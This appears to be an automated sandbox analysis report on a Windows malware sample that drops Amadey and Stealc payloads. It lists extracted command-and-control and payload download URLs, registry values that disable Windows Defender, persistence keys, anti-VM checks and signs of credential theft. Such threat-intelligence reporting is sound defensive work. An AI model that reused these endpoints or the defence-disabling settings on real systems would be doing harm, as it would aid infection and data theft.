Analysis
-
max time kernel
84s -
max time network
156s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
26/03/2025, 09:19
Static task
static1
Behavioral task
behavioral1
Sample
7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe
Resource
win10ltsc2021-20250314-en
General
-
Target
7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe
-
Size
1.8MB
-
MD5
e13b8e511787a1d1fba4df4bef37ed4f
-
SHA1
4b49c4dbbdd29a5d982fc54fbe1dc8267bd0e81d
-
SHA256
7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3
-
SHA512
7b76b73777db5c8bb990b2d0a533c81ae41457c5e96ae34ab652225ce45297ce15b243665742afe0f041b2c4caf2f3b63b67271298442c7a4537256f1e54d86c
-
SSDEEP
24576:QAyHpGFysY88QNM7a9oBNcptVNL/fEy9mT6FsCM+EaIte2QZJ1j8E:QZH8E388sM7aiWptVNwlgjI30g
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/9408-30246-0x0000000000180000-0x00000000005DC000-memory.dmp healer behavioral1/memory/9408-30247-0x0000000000180000-0x00000000005DC000-memory.dmp healer behavioral1/memory/9408-30868-0x0000000000180000-0x00000000005DC000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 44c4d0390b.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 44c4d0390b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 44c4d0390b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 44c4d0390b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 44c4d0390b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 44c4d0390b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 44c4d0390b.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 44c4d0390b.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 44c4d0390b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 44c4d0390b.exe -
Modifies security service 2 TTPs 3 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 44c4d0390b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp80F8SEVFBWGVS7JF51DS61OK9MWDHURZ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e3c37ce7e0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fc32507700.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 84 8220 powershell.exe 89 10276 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 13164 powershell.exe 8220 powershell.exe 10276 powershell.exe 11428 powershell.exe 8944 powershell.exe 1816 powershell.exe 9524 powershell.exe 2400 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 13 IoCs
flow pid Process 18 644 rapes.exe 26 644 rapes.exe 84 8220 powershell.exe 89 10276 powershell.exe 25 3836 svchost.exe 37 644 rapes.exe 37 644 rapes.exe 37 644 rapes.exe 37 644 rapes.exe 37 644 rapes.exe 37 644 rapes.exe 37 644 rapes.exe 37 644 rapes.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\f2a9b14d.sys 376c5cde.exe File created C:\Windows\System32\Drivers\klupd_f2a9b14da_arkmon.sys 376c5cde.exe File created C:\Windows\System32\Drivers\klupd_f2a9b14da_klbg.sys 376c5cde.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 6448 takeown.exe 6460 icacls.exe -
Sets service image path in registry 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_f2a9b14da_mark\ImagePath = "System32\\Drivers\\klupd_f2a9b14da_mark.sys" 376c5cde.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_f2a9b14da_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_f2a9b14da_arkmon.sys" 376c5cde.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\f2a9b14d\ImagePath = "System32\\Drivers\\f2a9b14d.sys" 376c5cde.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_f2a9b14da_arkmon\ImagePath = "System32\\Drivers\\klupd_f2a9b14da_arkmon.sys" 376c5cde.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_f2a9b14da_klbg\ImagePath = "System32\\Drivers\\klupd_f2a9b14da_klbg.sys" 376c5cde.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_f2a9b14da_klark\ImagePath = "System32\\Drivers\\klupd_f2a9b14da_klark.sys" 376c5cde.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp80F8SEVFBWGVS7JF51DS61OK9MWDHURZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e3c37ce7e0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp80F8SEVFBWGVS7JF51DS61OK9MWDHURZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fc32507700.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fc32507700.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e3c37ce7e0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 44c4d0390b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 44c4d0390b.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation TbV75ZR.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation TbV75ZR.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation mshta.exe -
Deletes itself 1 IoCs
pid Process 2020 w32tm.exe -
Executes dropped EXE 23 IoCs
pid Process 644 rapes.exe 2296 f73ae_003.exe 5924 7IIl2eE.exe 1040 tzutil.exe 2020 w32tm.exe 1596 apple.exe 464 11.exe 6260 11.exe 7584 TbV75ZR.exe 8036 bb770c5446.exe 1664 b17f772399.exe 10828 Temp80F8SEVFBWGVS7JF51DS61OK9MWDHURZ.EXE 11888 483d2fa8a0d53818306efeb32d3.exe 12000 Exam.com 3964 7caa1dbd.exe 12412 e3c37ce7e0.exe 13012 376c5cde.exe 8432 fc32507700.exe 8500 rapes.exe 7988 cd71e90de3.exe 9408 44c4d0390b.exe 1612 TbV75ZR.exe 7380 f73ae_003.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Software\Wine Temp80F8SEVFBWGVS7JF51DS61OK9MWDHURZ.EXE Key opened \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Software\Wine e3c37ce7e0.exe Key opened \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Software\Wine fc32507700.exe Key opened \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Software\Wine 44c4d0390b.exe Key opened \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Software\Wine 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe Key opened \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Software\Wine rapes.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\f2a9b14d.sys 376c5cde.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\f2a9b14d.sys\ = "Driver" 376c5cde.exe -
Loads dropped DLL 25 IoCs
pid Process 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 6448 takeown.exe 6460 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 44c4d0390b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 44c4d0390b.exe -
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bb770c5446.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10339220101\\bb770c5446.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\2f05c27e-adc9-4fe7-9497-ad965ae4e218 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{2af3aaf3-61b2-4108-b84a-b1d79a1f15c8}\\2f05c27e-adc9-4fe7-9497-ad965ae4e218.cmd\"" 376c5cde.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cd71e90de3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10339420101\\cd71e90de3.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10339230121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e3c37ce7e0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10339400101\\e3c37ce7e0.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fc32507700.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10339410101\\fc32507700.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\44c4d0390b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10339430101\\44c4d0390b.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: 376c5cde.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 336 bitbucket.org 337 bitbucket.org -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 376c5cde.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0005000000016531-29587.dat autoit_exe behavioral1/files/0x0007000000028212-30201.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 9844 tasklist.exe 11120 tasklist.exe 1160 tasklist.exe 1664 tasklist.exe 12760 tasklist.exe 12888 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4596 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe 644 rapes.exe 10828 Temp80F8SEVFBWGVS7JF51DS61OK9MWDHURZ.EXE 11888 483d2fa8a0d53818306efeb32d3.exe 12412 e3c37ce7e0.exe 8432 fc32507700.exe 8500 rapes.exe 9408 44c4d0390b.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1664 set thread context of 10340 1664 b17f772399.exe 200 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 7caa1dbd.exe File opened (read-only) \??\VBoxMiniRdrDN 376c5cde.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\AmMonitoringInstall.mof cmd.exe File opened for modification C:\Program Files\Windows Defender\ClientWMIInstall.mof cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ThirdPartyNotices.txt cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ProtectionManagement.mof cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\EppManifest.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRtp.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\DefenderCSP.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\shellext.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\Offline\EppManifest.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe -
Drops file in Windows directory 32 IoCs
description ioc Process File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\MandateFlashing TbV75ZR.exe File opened for modification C:\Windows\ThoseTransit TbV75ZR.exe File opened for modification C:\Windows\IstRepresentative TbV75ZR.exe File opened for modification C:\Windows\SinghCooling TbV75ZR.exe File opened for modification C:\Windows\DollStriking TbV75ZR.exe File created C:\Windows\Tasks\rapes.job 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\SinghCooling TbV75ZR.exe File opened for modification C:\Windows\MandateFlashing TbV75ZR.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ThinksMartin TbV75ZR.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\VeryBulk TbV75ZR.exe File opened for modification C:\Windows\ThinksMartin TbV75ZR.exe File opened for modification C:\Windows\FinancingPortable TbV75ZR.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\AdministratorNhs TbV75ZR.exe File opened for modification C:\Windows\ThoseTransit TbV75ZR.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\IstRepresentative TbV75ZR.exe File opened for modification C:\Windows\FinancingPortable TbV75ZR.exe File opened for modification C:\Windows\VeryBulk TbV75ZR.exe File opened for modification C:\Windows\AdministratorNhs TbV75ZR.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\DollStriking TbV75ZR.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6360 sc.exe 2612 sc.exe 1400 sc.exe 2820 sc.exe 3888 sc.exe 6856 sc.exe 3612 sc.exe 5764 sc.exe 6376 sc.exe 6584 sc.exe 6756 sc.exe 6900 sc.exe 5992 sc.exe 5116 sc.exe 7412 sc.exe 6536 sc.exe 6792 sc.exe 1316 sc.exe 2004 sc.exe 6432 sc.exe 6480 sc.exe 6552 sc.exe 4604 sc.exe 1168 sc.exe 6416 sc.exe 6612 sc.exe 6656 sc.exe 6968 sc.exe 7084 sc.exe 7232 sc.exe 1100 sc.exe 7004 sc.exe 3604 sc.exe 7200 sc.exe 6688 sc.exe 4588 sc.exe 7144 sc.exe 4044 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh 376c5cde.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh 376c5cde.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 8400 12000 WerFault.exe 210 9288 12484 WerFault.exe 281 -
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language cd71e90de3.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage cd71e90de3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7caa1dbd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e3c37ce7e0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened 